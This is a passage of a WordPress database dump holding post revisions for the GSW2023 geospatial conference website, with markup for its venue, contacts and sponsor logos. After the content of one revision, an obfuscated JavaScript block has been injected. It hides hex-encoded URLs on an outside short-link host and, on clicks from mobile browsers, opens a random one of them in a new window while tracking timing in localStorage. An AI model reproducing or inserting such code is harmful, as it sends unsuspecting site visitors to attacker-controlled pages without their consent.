letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 02:57:05','2023-08-16 02:57:05','',3066,'https://gsw2023.com/?p=5274',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(5275,1,'2023-08-16 02:57:38','2023-08-16 02:57:38','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692154546806{margin-top: 50px !important;}\"]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 18pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 18pt;\"><strong>Prime Minister of the </strong></span><span style=\"font-size: 18pt;\"><strong>Arab Republic of Egypt</strong></span></h6>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter 